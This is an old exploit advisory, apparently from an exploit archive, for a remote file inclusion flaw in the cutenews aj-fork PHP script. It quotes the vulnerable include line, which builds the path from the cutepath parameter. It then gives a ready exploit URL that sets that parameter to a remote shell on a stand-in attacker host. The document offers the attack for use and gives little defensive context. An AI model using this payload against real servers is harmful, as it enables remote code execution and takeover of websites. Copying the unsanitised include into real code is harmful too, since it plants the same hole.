cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

2006-12-04T00:00:00
ID 1337DAY-ID-1235
Type zdt
Reporter DeltahackingTEAM
Modified 2006-12-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
=====================================================================



===========================================================================================================
DeltasecurityTEAM
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug



#  0day.today [2018-04-14]  #